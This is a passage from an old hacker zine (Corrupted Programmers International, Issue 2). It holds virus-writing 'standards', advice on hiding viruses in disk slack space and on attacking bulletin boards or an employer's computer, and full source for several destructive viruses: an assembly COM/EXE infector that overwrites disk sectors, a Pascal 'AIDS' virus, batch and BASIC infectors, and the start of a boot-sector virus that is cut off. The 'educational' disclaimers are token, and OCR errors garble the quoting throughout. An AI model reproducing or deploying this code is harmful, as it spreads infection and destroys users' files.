+ + + + + +because that has the same Read-only effect (even tho I havenYt seen it written, +itYs true that if the file is designated system, DOS treats it as read-only, +whether the R-O flag is set or not). The space after IBMBIOS.COM or IBMDOS.COM +in MS-DOS (not PC-DOS, it uses different files, or so I am told; IYve been too +lazy to find out myself) or a protected (!) COMMAND.COM file in either type of +DOS would be ideal for this. All you have to do is then insert your loader into +some innocent-looking file, and you are in business. All your loader has to do +is read the sector into the highest part of memory, and do a far call to it. +Your virus cann then go about waiting for floppy disks to infect, and place +loaders on any available executable file on the disk. Sound pretty neet? It is! +Anyway, have fun, and be sure to upload your virus, along with a README file on +how it works to CPI Headquarters so we can check it out! And remember: donYt +target P/H/P boards (thatYs Phreak/Hack/Pirate boards) with ANY virus. Even if +the Sysop is a leech and you want to shove his balls down his throat. Because +if all the PHP boards go down (especially members of CPI), who the hell can you +go to for all these nifty virus ideas? And besides, itYs betraying your own +people, which is uncool even if you are an anarchist. So, target uncool PD +boards, or your bossYs computer or whatever, but donYt attack your friends. +Other than that, have phun, and phuck it up! + + Ashton Darkside + Dallas Underground Network Exchange (DUNE) + Software And Telecom Applicaitons Network (SATAN) + Corrupted Programmers International (CPI) + + +PS: Watch it, this file (by itself) has about 3 1/2k of slack (on a hard disk). + +Call these boards because the sysops are cool: +Oblivion (SATAN HQ) Sysop: Agent Orange (SATAN leader) +System: Utopia (SATAN HQ) Sysop: RobbinY Hood (SATAN leader) +The Andromeda Strain (CPI HQ) Sysop: Acid Phreak (CPI leader) +D.U.N.E. (DUNE HQ) Sysop: Freddy Krueger (DUNE leader) +The Jolly BardsmenYs Pub & Tavern +The Sierra Crib +The Phrozen Phorest +Knight ShadowYs Grotto + +And if I forgot your board, sorry, but donYt send me E-mail bitching about it! + + +Subject: CPI Issue 2 4/11 +To: tk0jut2 +Original_To: BITNET%"tk0jut2@niu" + + +[2.4] +------------------------------------------------------------------------------- + ______ ________ ___________ + / ____ \ | ____ \ |____ ____| + | / \_| | | \ | | | + | | | |_____| | | | + | | | ______/ | | + | | _ | | | | + | \____/ | /\ | | /\ ____| |____ /\ + \______/ \/ |_| \/ |___________| \/ + + + oWe ainYt the phucking Salvation Army.@ + +------------------------------------------------------------------------------- + + + C O R R U P T E D P R O G R A M M E R S I N T E R N A T I O N A L + + * * * present * * * + + CPI Virus Standards - Protect yourself and your friends + + By Ashton Darkside (DUNE / SATAN / CPI) + + +******************************************************************************* +DISCLAIMER: This text file is provided to the masses for INFORMATIONAL PURPOSES + ONLY! The author does NOT condone the use of this information in any manner + that would be illegal or harmful. The fact that the author knows and spreads + this information in no way suggests that he uses it. The author also accepts + no responsibility for the malicious use of this information by anyone who + reads it! Remember, we may talk alot, but we ojust say no@ to doing it. +******************************************************************************* + + + + + + + + + + One of the main problems with viruses is that once you set one loose, +it is no longer under your control. I propose to stop this by introducing some +standards of virus writing that will enable them to be deactivated whenever +they enter a ZfriendlyY (CPI) system. In the long run, even the author of the +virus is not immune to being attacked. The following are what I have termed the +CPI standards for writing viruses. They will allow a virus to easily check any +system they are being run on for a type of Zidentity badgeY. If it is found, +the virus will not infect the system it is being run on. The other standards +are mostly written around this. + +CPI Standards for writing viruses - + + 1 - The virus will have an Zactive periodY and an Zinactive periodY. + The active periods will be no more than one year in length (to make + it more difficult to discover the virus). You may release different + versions of your virus with different Zactive periodsY. It is not + recommended that your virus deactivate itself after the set active + period, as this would enable people to deactivate viruses by using + their computer with the date set to 2069 or something. It is also + required that activation periods begin on January 1 and end on + December 31. This will coincide with the changing identity codes. + + 2 - The virus will check for an identity code by executing Interrrupt + 12h with the following register settings: AX - 4350, BX - 4920, + CX - AB46, DX - 554E. If the system is friendly, then a pointer + will be returned in CX:DX to an ASCIIZ (0-terminated) string which + will have different contents in different years. The codes are not + to be included in any text file, and should only be given through + E-mail on CPI affiliated systems. You can always ask me by sending + me mail at The Andromeda Strain BBS. If a system is detected as + friendly, the virus will not attempt to infect or damage it, but it + is ok to display a little greeting message about how lucky the + user was. + + 3 - We very much encourage you to upload your virus, along with a breif + description on the workings into the CPI section at The Andromeda + Strain BBS. Only CPI members will know about your virus. This is + so that CPI members can share techniques and it also allows us to + verify that the identity check works. If we see any improvements + that could be made, such as ways to streamline code, better ways of + spreading, etc. we will inform you so that you can make the changes + if you wish. + + 4 - It is also suggested that you use ADS standard for virus storage on + infected disks. This meathod uses disk slack space for storage and + is more thoroughly described in a previous text file by me. I think + that this is the most effective and invisible way to store viruli. + + 5 - A list of CPI-Standard viruli will be avaliable at all times from + The Andromeda Strain BBS, to CPI users. Identity strings will also + be available to anyone in CPI, or anyone who uploads source code to + a virus which is 100% complete except for the Identity string (it + must be written to CPI-Standards). Non-CPI members who do this will + be more seriously considered for membership in CPI. + + Ashton Darkside + Dallas Underground Network Exchange (DUNE) + Software And Telecom Applications Network (SATAN) + Corrupted Programmers International (CPI) + +PS: This file (by itself) has approx 2.5k of slack. + + +Subject: CPI Issue 2 5/11 +To: tk0jut2 +Original_To: BITNET%"tk0jut2@niu" + + +;============================================================================= +; +; C*P*I +; +; CORRUPTED PROGRAMMING INTERNATIONAL +; ----------------------------------- +; p r e s e n t s +; +; T H E +; _ _ +; (g) GENERIC VIRUS (g) +; ^ ^ +; +; +; A GENERIC VIRUS - THIS ONE MODIFIES ALL COM AND EXE FILES AND ADDS A BIT OF +; CODE IN AND MAKES EACH A VIRUS. HOWEVER, WHEN IT MODIFIES EXE FILES, IT +; RENAMES THE EXE TO A COM, CAUSING DOS TO GIVE THE ERROR oPROGRAM TO BIG TO +; FIT IN MEMORY@ THIS WILL BE REPAIRED IN LATER VERSIONS OF THIS VIRUS. +; +; WHEN IT RUNS OUT OF FILES TO INFECT, IT WILL THEN BEGIN TO WRITE GARBAGE ON +; THE DISK. HAVE PHUN WITH THIS ONE. +; +; ALSO NOTE THAT THE COMMENTS IN (THESE) REPRESENT DESCRIPTION FOR THE CODE +; IMMEDIATE ON THAT LINE. THE OTHER COMMENTS ARE FOR THE ENTIRE ;| GROUPING. +; +; THIS FILE IS FOR EDUCATIONAL PURPOSES ONLY. THE AUTHOR AND CPI WILL NOT BE +; HELD RESPONSIBLE FOR ANY ACTIONS DUE TO THE READER AFTER INTRODUCTION OF +; THIS VIRUS. ALSO, THE AUTHOR AND CPI DO NOT ENDORSE ANY KIND OF ILLEGAL OR +; ILLICIT ACTIVITY THROUGH THE RELEASE OF THIS FILE. +; +; DOCTOR DISSECTOR +; CPI ASSOCIATES +; +;============================================================================= + +MAIN: + NOP ;| Marker bytes that identify this program + NOP ;| as infected/a virus + NOP ;| + + MOV AX,00 ;| Initialize the pointers + MOV ES:[POINTER],AX ;| + MOV ES:[COUNTER],AX ;| + MOV ES:[DISKS B],AL ;| + + MOV AH,19 ;| Get the selected drive (dir?) + INT 21 ;| + + MOV CS:DRIVE,AL ;| Get current path (save drive) + MOV AH,47 ;| (dir?) + MOV DH,0 ;| + ADD AL,1 ;| + MOV DL,AL ;| (in actual drive) + LEA SI,CS:OLD_PATH ;| + INT 21 ;| + + MOV AH,0E ;| Find # of drives + MOV DL,0 ;| + INT 21 ;| + CMP AL,01 ;| (Check if only one drive) + JNZ HUPS3 ;| (If not one drive, go the HUPS3) + MOV AL,06 ;| Set pointer to SEARCH_ORDER +6 (one drive) + + HUPS3: MOV AH,0 ;| Execute this if there is more than 1 drive + LEA BX,SEARCH_ORDER ;| + ADD BX,AX ;| + ADD BX,0001 ;| + MOV CS:POINTER,BX ;| + CLC ;| + +CHANGE_DISK: ;| Carry is set if no more .COM files are + JNC NO_NAME_CHANGE ;| found. From here, .EXE files will be + MOV AH,17 ;| renamed to .COM (change .EXE to .COM) + LEA DX,CS:MASKE_EXE ;| but will cause the error message oProgram + INT 21 ;| to large to fit in memory@ when starting + CMP AL,0FF ;| larger infected programs + JNZ NO_NAME_CHANGE ;| (Check if an .EXE is found) + + MOV AH,2CH ;| If neither .COM or .EXE files can be found, + INT 21 ;| then random sectors on the disk will be + MOV BX,CS:POINTER ;| overwritten depending on the system time + MOV AL,CS:[BX] ;| in milliseconds. This is the time of the + MOV BX,DX ;| complete oinfection@ of a storage medium. + MOV CX,2 ;| The virus can find nothing more to infect + MOV DH,0 ;| starts its destruction. + INT 26 ;| (write crap on disk) + +NO_NAME_CHANGE: ;| Check if the end of the search order table + MOV BX,CS:POINTER ;| has been reached. If so, end. + DEC BX ;| + MOV CS:POINTER,BX ;| + MOV DL,CS:[BX] ;| + CMP DL,0FF ;| + JNZ HUPS2 ;| + JMP HOPS ;| + +HUPS2: ;| Get a new drive from the search order table + MOV AH,0E ;| and select it, beginning with the ROOT dir. + INT 21 ;| (change drive) + MOV AH,3B ;| (change path) + LEA DX,PATH ;| + INT 21 ;| + JMP FIND_FIRST_FILE ;| + +FIND_FIRST_SUBDIR: ;| Starting from the root, search for the + MOV AH,17 ;| first subdir. First, (change .exe to .com) + LEA DX,CS:MASKE_EXE ;| convert all .EXE files to .COM in the + INT 21 ;| old directory. + MOV AH,3B ;| (use root directory) + LEA DX,PATH ;| + INT 21 ;| + MOV AH,04E ;| (search for first subdirectory) + MOV CX,00010001B ;| (dir mask) + LEA DX,MASKE_DIR ;| + INT 21 ;| + JC CHANGE_DISK ;| + MOV BX,CS:COUNTER ;| + INC BX ;| + DEC BX ;| + JZ USE_NEXT_SUBDIR ;| + +FIND_NEXT_SUBDIR: ;| Search for the next sub-dir, if no more + MOV AH,4FH ;| are found, the (search for next subdir) + INT 21 ;| drive will be changed. + JC CHANGE_DISK ;| + DEC BX ;| + JNZ FIND_NEXT_SUBDIR ;| + +USE_NEXT_SUBDIR: + MOV AH,2FH ;| Select found directory. (get dta address) + INT 21 ;| + ADD BX,1CH ;| + MOV ES:[BX],W@\@ ;| (address of name in dta) + INC BX ;| + PUSH DS ;| + MOV AX,ES ;| + MOV DS,AX ;| + MOV DX,BX ;| + MOV AH,3B ;| (change path) + INT 21 ;| + POP DS ;| + MOV BX,CS:COUNTER ;| + INC BX ;| + MOV CS:COUNTER,BX ;| + +FIND_FIRST_FILE: ;| Find first .COM file in the current dir. + MOV AH,04E ;| If there are none, (Search for first) + MOV CX,00000001B ;| search the next directory. (mask) + LEA DX,MASKE_COM ;| + INT 21 ;| + JC FIND_FIRST_SUBDIR ;| + JMP CHECK_IF_ILL ;| + +FIND_NEXT_FILE: ;| If program is ill (infected) then search + MOV AH,4FH ;| for another. (search for next) + INT 21 ;| + JC FIND_FIRST_SUBDIR ;| + +CHECK_IF_ILL: ;| Check if already infected by virus. + MOV AH,3D ;| (open channel) + MOV AL,02 ;| (read/write) + MOV DX,9EH ;| (address of name in dta) + INT 21 ;| + MOV BX,AX ;| (save channel) + MOV AH,3FH ;| (read file) + MOV CH,BUFLEN ;| + MOV DX,BUFFER ;| (write in buffer) + INT 21 ;| + MOV AH,3EH ;| (close file) + INT 21 ;| + MOV BX,CS:[BUFFER] ;| (look for three NOPYs) + CMP BX,9090 ;| + JZ FIND_NEXT_FILE ;| + + MOV AH,43 ;| This section by-passes (write enable) + MOV AL,0 ;| the MS/PC DOS Write Protection. + MOV DX,9EH ;| (address of name in dta) + INT 21 ;| + MOV AH,43 ;| + MOV AL,01 ;| + AND CX,11111110B ;| + INT 21 ;| + + MOV AH,3D ;| Open file for read/write (open channel) + MOV AL,02 ;| access (read/write) + MOV DX,9EH ;| (address of name in dta) + INT 21 ;| + + MOV BX,AX ;| Read date entry of program and (channel) + MOV AH,57 ;| save for future use. (get date) + MOV AL,0 ;| + INT 21 ;| + PUSH CX ;| (save date) + PUSH DX ;| + + MOV DX,CS:[CONTA W] ;| The jump located at 0100h (save old jmp) + MOV CS:[JMPBUF],DX ;| the program will be saved for future use. + MOV DX,CS:[BUFFER+1] ;| (save new jump) + LEA CX,CONT-100 ;| + SUB DX,CX ;| + MOV CS:[CONTA],DX ;| + + MOV AH,57 ;| The virus now copies itself to (write date) + MOV AL,1 ;| to the start of the file. + POP DX ;| + POP CX ;| (restore date) + INT 21 ;| + MOV AH,3EH ;| (close file) + INT 21 ;| + + MOV DX,CS:[JMPBUF] ;| Restore the old jump address. The virus + MOV CS:[CONTA],DX ;| at address oCONTA@ the jump which was at the + ;| start of the program. This is done to +HOPS: ;| preserve the executability of the host + NOP ;| program as much as possible. After saving, + CALL USE_OLD ;| it still works with the jump address in the + ;| virus. The jump address in the virus differs + ;| from the jump address in memory + +CONT DB 0E9 ;| Continue with the host program (make jump) +CONTA DW 0 ;| + MOV AH,00 ;| + INT 21 ;| + +USE_OLD: + MOV AH,0E ;| Reactivate the selected (use old drive) + MOV DL,CS:DRIVE ;| drive at the start of the program, and + INT 21 ;| reactivate the selected path at the start + MOV AH,3B ;| of the program.(use old drive) + LEA DX,OLD_PATH-1 ;| (get old path and backslash) + INT 21 ;| + RET ;| + +SEARCH_ORDER DB 0FF,1,0,2,3,0FF,00,0FF + +POINTER DW 0000 ;| (pointer f. search order) +COUNTER DW 0000 ;| (counter f. nth. search) +DISKS DB 0 ;| (number of disks) +MASKE_COM DB o*.COM@,00 ;| (search for com files) +MASKE_DIR DB o*@,00 ;| (search for dirYs) +MASKE_EXE DB 0FF,0,0,0,0,0,00111111XB + DB 0,@????????EXE@,0,0,0,0 + DB 0,@????????COM@,0 +MASKE_ALL DB 0FF,0,0,0,0,0,00111111XB + DB 0,@???????????@,0,0,0,0 + DB 0,@????????COM@,0 + +BUFFER EQU 0E00 ;| (a safe place) + +BUFLEN EQU 208H ;| Length of virus. Modify this accordingly + ;| if you modify this source. Be careful + ;| for this may change! + +JMPBUF EQU BUFFER+BUFLEN ;| (a safe place for jmp) + +PATH DB o\@,0 ;| (first place) +DRIVE DB 0 ;| (actual drive) +BACK_SLASH DB o\@ +OLD_PATH DB 32 DUP (?) ;| (old path) + + +Subject: CPI Issue 2 6/11 +To: tk0jut2 +Original_To: BITNET%"tk0jut2@niu" + + +[2.6] + +-------------------------------+ +--------------------------------------+ + | | P | | + | @@@@@@@ @@@@@@@@ @@@@@@@@ | * | ##### ##### #### ##### | + | @@ @@ @@ @@ | R | # # # # # # | + | @@ @@ @@ @@ | * | ##### # # # ##### | + | @@ @@@@@@@@ @@ | E | # # # # # # | + | @@ @@ @@ | * | # # ##### #### ##### | + | @@ @@ @@ | S | | + | @@@@@@@ @@ @@@@@@@@ | * +--------------------------------------+ + | | E | A NEW AND IMPROVED VIRUS FOR | + +-------------------------------+ * | PC/MS DOS MACHINES | + | C O R R U P T E D | N +--------------------------------------+ + | | * | CREATED BY: DOCTOR DISSECTOR | + | P R O G R A M M I N G | T |FILE INTENDED FOR EDUCATIONAL USE ONLY| + | | * | AUTHOR NOT RESPONSIBLE FOR READERS | + | I N T E R N A T I O N A L | S |DOES NOT ENDORSE ANY ILLEGAL ACTIVITYS| + +-------------------------------+ +--------------------------------------+ + + Well well, here it is... I call it AIDS... It infects all COM files, but it is + not perfect, so it will also change the date/time stamp to the current system. + Plus, any READ-ONLY attributes will ward this virus off, it doesnYt like them! + + Anyway, this virus was originally named NUMBER ONE, and I modified the code so + that it would fit my needs. The source code, which is included with this neato + package was written in Turbo Pascal 3.01a. Yeah I know itYs old, but it works. + + Well, I added a few things, you can experiment or mess around with it if youYd + like to, and add any mods to it that you want, but change the name and give us + some credit if you do. + + The file is approximately 13k long, and this extra memory will be added to the + file it picks as host. If no more COM files are to be found, it picks a random + value from 1-10, and if it happens to be the lucky number 7, AIDS will present + a nice screen with lots of smiles, with a note telling the operator that their + system is now screwed, I mean permanantly. The files encrypted containing AIDS + in their code are IRREVERSIBLY messed up. Oh well... + + Again, neither CPI nor the author of Number One or AIDS endorses this document + and program for use in any illegal manner. Also, CPI, the author to Number One + and AIDS is not responsible for any actions by the readers that may prove harm + in any way or another. This package was written for EDUCATIONAL purposes only! + +{ Beginning of source code, Turbo Pascal 3.01a } +{C-} +{U-} +{I-} { Wont allow a user break, enable IO check } + +{ -- Constants --------------------------------------- } + +Const + VirusSize = 13847; { AIDSYs code size } + + Warning :String[42] { Warning message } + = ZThis File Has Been Infected By AIDS! HaHa!Y; + +{ -- Type declarations------------------------------------- } + +Type + DTARec =Record { Data area for file search } + DOSnext :Array[1..21] of Byte; + Attr : Byte; + Ftime, + FDate, + FLsize, + FHsize : Integer; + FullName: Array[1..13] of Char; + End; + +Registers = Record {Register set used for file search } + Case Byte of + 1 : (AX,BX,CX,DX,BP,SI,DI,DS,ES,Flags : Integer); + 2 : (AL,AH,BL,BH,CL,CH,DL,DH : Byte); + End; + +{ -- Variables--------------------------------------------- } + +Var + { Memory offset program code } + ProgramStart : Byte absolute Cseg:$100; + { Infected marker } + MarkInfected : String[42] absolute Cseg:$180; + Reg : Registers; { Register set } + DTA : DTARec; { Data area } + Buffer : Array[Byte] of Byte; { Data buffer } + TestID : String[42]; { To recognize infected files } + UsePath : String[66]; { Path to search files } + { Lenght of search path } + UsePathLenght: Byte absolute UsePath; + Go : File; { File to infect } + B : Byte; { Used } + LoopVar : Integer; {Will loop forever} + +{ -- Program code------------------------------------------ } + +Begin + GetDir(0, UsePath); { get current directory } + if Pos(Z\Y, UsePath) <> UsePathLenght then + UsePath := UsePath + Z\Y; + UsePath := UsePath + Z*.COMY; { Define search mask } + Reg.AH := $1A; { Set data area } + Reg.DS := Seg(DTA); + Reg.DX := Ofs(DTA); + MsDos(Reg); + UsePath[Succ(UsePathLenght)]:=#0; { Path must end with #0 } + Reg.AH := $4E; + Reg.DS := Seg(UsePath); + Reg.DX := Ofs(UsePath[1]); + Reg.CX := $ff; { Set attribute to find ALL files } + MsDos(Reg); { Find first matching entry } + IF not Odd(Reg.Flags) Then { If a file found then } + Repeat + UsePath := DTA.FullName; + B := Pos(#0, UsePath); + If B > 0 then + Delete(UsePath, B, 255); { Remove garbage } + Assign(Go, UsePath); + Reset(Go); + If IOresult = 0 Then { If not IO error then } + Begin + BlockRead(Go, Buffer, 2); + Move(Buffer[$80], TestID, 43); + { Test if file already ill(Infected) } + If TestID <> Warning Then { If not then ... } + Begin + Seek (Go, 0); + { Mark file as infected and .. } + MarkInfected := Warning; + { Infect it } + BlockWrite(Go,ProgramStart,Succ(VirusSize shr 7)); + Close(Go); + Halt; {.. and halt the program } + End; + Close(Go); + End; + { The file has already been infected, search next. } + Reg.AH := $4F; + Reg.DS := Seg(DTA); + Reg.DX := Ofs(DTA); + MsDos(Reg); + { ......................Until no more files are found } + Until Odd(Reg.Flags); +Loopvar:=Random(10); +If Loopvar=7 then +begin + Writeln(Z + + + + + + + + +Y); {Give a lot of smiles} +Writeln(ZY); +Writeln(Z Y); +Writeln(Z ATTENTION: + Y); +Writeln(Z I have been elected to inform you that throughout your process of + Y); +Writeln(Z collecting and executing files, you have accidentally HK? Y +); +Writeln(Z yourself over; again, thatYZs PHUCKED yourself over. No, it canno +t Y); +Writeln(Z be; YES, it CAN be, a wDs has infected your system. Now what do + Y); +Writeln(Z you have to say about that? HAHAHAHA. Have H with this one and +Y); +Writeln(Z remember, there is NO cure for + Y); +Writeln(Z + Y); +Writeln(Z 7777777777 777777777777 77777777777 7777777777 + Y); +Writeln(Z 777777 77 77777 77777 + Y); +Writeln(Z 77 77 77 77 77 77  + Y); +Writeln(Z 77 77 77 77 77 77 + Y); +Writeln(Z 777777777777 77 77 77 777777777777 + Y); +Writeln(Z 7777 77 77 77 77 + Y); +Writeln(Z 77 77 77 77 77 77 + Y); +Writeln(Z 77 77 77 77 777 77 777 + Y); +Writeln(Z 77 77 777777777777 77777777777 7777777777 + Y); +Writeln(Z      + Y); +Writeln(Z + Y); +Writeln(Z Y); +REPEAT +LOOPVAR:=0; +UNTIL LOOPVAR=1; +end; +End. + +{ Although this is a primitive virus its effective. } +{ In this virus only the .COM } +{ files are infected. Its about 13K and it will } +{ change the date entry. } + + +Subject: CPI Issue 2 7/11 +To: tk0jut2 +Original_To: BITNET%"tk0jut2@niu" + + +[2.7] + + Batch Viruses + ------------- + + +Whoever thought that viruses could be in BATCH file.This virus which we + +are about to see makes use of MS-DOS operating system. This BATCH virus +uses DEBUG & EDLIN programs. + +Name: VR.BAT + +echo = off ( Self explanatory) +ctty nul ( This is important. Console output is turned off) +path c:\msdos ( May differ on other systems ) +dir *.com/w>ind ( The directory is written on oind@ ONLY name entries) + +edlin ind<1 ( oInd@ is processed with EDLIN so only file names appear) +debug ind<2 ( New batch program is created with debug) +edlin name.bat<3 ( This batch goes to an executable form because of EDLIN) +ctty con ( Console interface is again assigned) +name ( Newly created NAME.BAT is called. + + +In addition to file to this Batch file,there command files,here named 1,2,3 + +Here is the first command file: +------------------------------- +Name: 1 + +1,4d ( Here line 1-4 of the oIND@ file are deleted ) +e ( Save file ) + +Here is the second command file: +-------------------------------- +Name: 2 + +m100,10b,f000 (First program name is moved to the F000H address to save) + +e108 o.BAT@ (Extention of file name is changed to .BAT) +m100,10b,f010 (File is saved again) +e100@DEL o (DEL command is written to address 100H) +mf000,f00b,104 (Original file is written after this command) +e10c 2e (Period is placed in from of extension) +e110 0d,0a (Carrige return+ line feed) +mf010,f020,11f ( Modified file is moved to 11FH address from buffer area) +e112 oCOPY \VR.BAT@ ( COPY command is now placed in front of file) +e12b od,0a (COPY command terminated with carriage return + lf) +rxc ( The CX register is ... ) +2c ( set to 2CH) +nname.bat ( Name it NAME.BAT) +w ( Write ) +q ( quit ) + + +The third command file must be printed as a hex dump because it contains +2 control characters (1Ah=Control Z) and this is not entirely printable. + +Hex dump of the third command file: +----------------------------------- +Name: 3 + +0100 31 2C 31 3F 52 20 1A 0D-6E 79 79 79 79 79 79 79 + 1 , 1 ? . . n y y y y y y y +0110 79 29 0D 32 2C 32 3F 52-20 1A OD 6E 6E 79 79 79 + y . 2 , ? ? r . . n n y y y +0120 79 79 79 79 29 0D 45 0D-00 00 00 00 00 00 00 00 + y y y y . E . . . . . . . . . + + +In order for this virus to work VR.BAT should be in the root. This program +only affects .COM files. + + +Subject: CPI Issue 2 8/11 +To: tk0jut2 +Original_To: BITNET%"tk0jut2@niu" + + +[2.8] + + Viruses in Basic + ---------------- + + +Basic is great language and often people think of it as a limited language +and will not be of any use in creating something like a virus. Well you are +really wrong. Lets take a look at a Basic Virus created by R. Burger in 1987. +This program is an overwritting virus and uses (Shell) MS-DOS to infect .EXE +files.To do this you must compile the source code using a the Microsoft +Quick-BASIC.Note the lenght of the compiled and the linked .EXE file and edit +the source code to place the lenght of the object program in the LENGHTVIR +variable. BV3.EXE should be in the current directory, COMMAND.COM must be +available, the LENGHTVIR variable must be set to the lenght of the linked + +program and remember to use /e parameter when compiling. + + + +10 REM ** DEMO +20 REM ** MODIFY IT YOUR OWN WAY IF DESIRED ** +30 REM ** BASIC DOESNT SUCK +40 REM ** NO KIDDING +50 ON ERROR GOTO 670 +60 REM *** LENGHTVIR MUST BE SET ** +70 REM *** TO THE LENGHT TO THE ** +80 REM *** LINKED PROGRAM *** +90 LENGHTVIR=2641 +100 VIRROOT$=@BV3.EXE@ +110 REM *** WRITE THE DIRECTORY IN THE FILE oINH@ +130 SHELL oDIR *.EXE>INH@ +140 REM ** OPEN oINH@ FILE AND READ NAMES ** +150 OPEN oR@,1,@INH@,32000 +160 GET #1,1 +170 LINE INPUT#1,ORIGINAL$ +180 LINE INPUT#1,ORIGINAL$ +190 LINE INPUT#1,ORIGINAL$ +200 LINE INPUT#1,ORIGINAL$ +210 ON ERROR GOT 670 +220 CLOSE#2 +230 F=1:LINE INPUT#1,ORIGINAL$ +240 REM ** o%@ IS THE MARKER OF THE BV3 +250 REM ** o%@ IN THE NAME MEANS +260 REM ** INFECTED COPY PRESENT +270 IF MID$(ORIGINAL$,1,1)=@%@ THEN GOTO 210 +280 ORIGINAL$=MID$(ORIGINAL$,1,13) +290 EXTENSIONS$=MID$(ORIGINAL,9,13) +300 MID$(EXTENSIONS$,1,1)=@.@ +310 REM *** CONCATENATE NAMES INTO FILENAMES ** +320 F=F+1 +330 IF MID$(ORIGINAL$,F,1)=@ o OR MID$ (ORIGINAL$,F,1)=@.@ OR F=13 THEN +GOTO 350 +340 GOTO 320 +350 ORIGINAL$=MID$(ORIGINAL$,1,F-1)+EXTENSION$ +360 ON ERROR GOTO 210 +365 TEST$=@o +370 REM ++ OPEN FILE FOUND +++ +380 OPEN oR@,2,OROGINAL$,LENGHTVIR +390 IF LOF(2) < LENGHTVIR THEN GOTO 420 +400 GET #2,2 +410 LINE INPUT#1,TEST$ +420 CLOSE#2 +431 REM ++ CHECK IF PROGRAM IS ILL ++ +440 REM ++ o%@ AT THE END OF THE FILE MEANS.. +450 REM ++ FILE IS ALREADY SICK ++ +460 REM IF MID$(TEST,2,1)=@%@ THEN GOTO 210 +470 CLOSE#1 +480 ORIGINALS$=ORIGINAL$ +490 MID$(ORIGINALS$,1,1)=@%@ +499 REM ++++ SANE oHEALTHY@ PROGRAM ++++ +510 C$=@COPY o+ORIGINAL$+@ o+ORIGINALS$ +520 SHELL C$ +530 REM *** COPY VIRUS TO HEALTHY PROGRAM **** +540 C$=@COPY o+VIRROOT$+ORIGINAL$ +550 SHELL C$ +560 REM *** APPEND VIRUS MARKER *** +570 OPEN ORIGINAL$ FOR APPEND AS #1 LEN=13 +580 WRITE#1,ORIGINALS$ +590 CLOSE#1 +630 REM ++ OUYPUT MESSAGE ++ +640 PRINT oINFECTION IN o ;ORIGIANAL$; o !! BE WARE !!@ +650 SYSTEM +660 REM ** VIRUS ERROR MESSAGE +670 PRINT oVIRUS INTERNAL ERROR GOTTCHA !!!!@:SYSTEM +680 END + + +This basic virus will only attack .EXE files. After the execution you will +see a oINH@ file which contains the directory, and the file %SORT.EXE. +Programs which start with o%@ are NOT infected ,they pose as back up copies. + + +Subject: CPI Issue 2 9/11 +To: tk0jut2 +Original_To: BITNET%"tk0jut2@niu" + + +;[2.9] +;-----------------------------------------------------------------------; +; This virus is of the oFLOPPY ONLY@ variety. ; +; It replicates to the boot sector of a floppy disk and when it gains control +; it will move itself to upper memory. It redirects the keyboard ; +; interrupt (INT 09H) to look for ALT-CTRL-DEL sequences at which time ; +; it will attempt to infect any floppy it finds in drive A:. ; +; It keeps the real boot sector at track 39, sector 8, head 0 ; +; It does not map this sector bad in the fat (unlike the Pakistani Brain) +; and should that area be used by a file, the virus ; +; will die. It also contains no anti detection mechanisms as does the ; +; BRAIN virus. It apparently uses head 0, sector 8 and not head 1 ; +; sector 9 because this is common to all floppy formats both single ; +; sided and double sided. It does not contain any malevolent TROJAN ; +; HORSE code. It does appear to contain a count of how many times it ; +; has infected other diskettes although this is harmless and the count ; +; is never accessed. ; +; ; +; Things to note about this virus: ; +; It can not only live through an ALT-CTRL-DEL reboot command, but this ; +; is its primary (only for that matter) means of reproduction to other ; +; floppy diskettes. The only way to remove it from an infected system ; +; is to turn the machine off and reboot an uninfected copy of DOS. ; +; It is even resident when no floppy is booted but BASIC is loaded ; +; instead. Then when ALT-CTRL-DEL is pressed from inside of BASIC, ; +; it activates and infectes the floppy from which the user is ; +; attempting to boot. ; +; ; +; Also note that because of the POP CS command to pass control to ; +; its self in upper memory, this virus does not to work on 80286 ; +; machines (because this is not a valid 80286 instruction). ; +; ; +; If your assembler will not allow the POP CS command to execute, replace; +; the POP CS command with an NOP and then assemble it, then debug that ; +; part of the code and place POP CS in place of NOP at that section. ; +; ; +; The Norton Utilities can be used to identify infected diskettes by ; +; looking at the boot sector and the DOS SYS utility can be used to ; +; remove it (unlike the Pakistani Brain). ; +;-----------------------------------------------------------------------; + ; + ORG 7C00H ; + ; +TOS LABEL WORD ;TOP OF STACK +;-----------------------------------------------------------------------; +; 1. Find top of memory and copy ourself up there. (keeping same offset); +; 2. Save a copy of the first 32 interrupt vectors to top of memory too ; +; 3. Redirect int 9 (keyboard) to ourself in top of memory ; +; 4. Jump to ourself at top of memory ; +; 5. Load and execute REAL boot sector from track 40, head 0, sector 8 ; +;-----------------------------------------------------------------------; +BEGIN: CLI ;INITIALIZE STACK + XOR AX,AX ; + MOV SS,AX ; + MOV SP,offset TOS ; + STI ; + ; + MOV BX,0040H ;ES = TOP OF MEMORY - (7C00H+512) + MOV DS,BX ; + MOV AX,[0013H] ; + MUL BX ; + SUB AX,07E0H ; (7C00H+512)/16 + MOV ES,AX ; + ; + PUSH CS ;DS = CS + POP DS ; + ; + CMP DI,3456H ;IF THE VIRUS IS REBOOTING... + JNE B_10 ; + DEC Word Ptr [COUNTER_1] ;...LOW&HI:COUNTER_1-- + ; +B_10: MOV SI,SP ;SP=7C00 ;COPY SELF TO TOP OF MEMORY + MOV DI,SI ; + MOV CX,512 ; + CLD ; + REP MOVSB ; + ; + MOV SI,CX ;CX=0 ;SAVE FIRST 32 INT VETOR ADDRESSES TO + MOV DI,offset BEGIN - 128 ; 128 BYTES BELOW OUR HI CODE + MOV CX,128 ; + REP MOVSB ; + ; + CALL PUT_NEW_09 ;SAVE/REDIRECT INT 9 (KEYBOARD) + ; + PUSH ES ;ES=HI ; JUMP TO OUR HI CODE WITH + POP CS + ; + PUSH DS ;DS=0 ; ES = DS + POP ES ; + ; + MOV BX,SP ; SP=7C00 ;LOAD REAL BOOT SECTOR TO 0000:7C00 + MOV DX,CX ;CX=0 ;DRIVE A: HEAD 0 + MOV CX,2708H ; TRACK 40, SECTOR 8 + MOV AX,0201H ; READ SECTOR + INT 13H ; (common to 8/9 sect. 1/2 sided!) + JB $ ; HANG IF ERROR + ; + JMP JMP_BOOT ;JMP 0000:7C00 + ; +;-----------------------------------------------------------------------; +; SAVE THEN REDIRECT INT 9 VECTOR ; +; ; +; ON ENTRY: DS = 0 ; +; ES = WHERE TO SAVE OLD_09 & (HI) ; +; WHERE NEW_09 IS (HI) ; +;-----------------------------------------------------------------------; +PUT_NEW_09: ; + DEC Word Ptr [0413H] ;TOP OF MEMORY (0040:0013) -= 1024 + ; + MOV SI,9*4 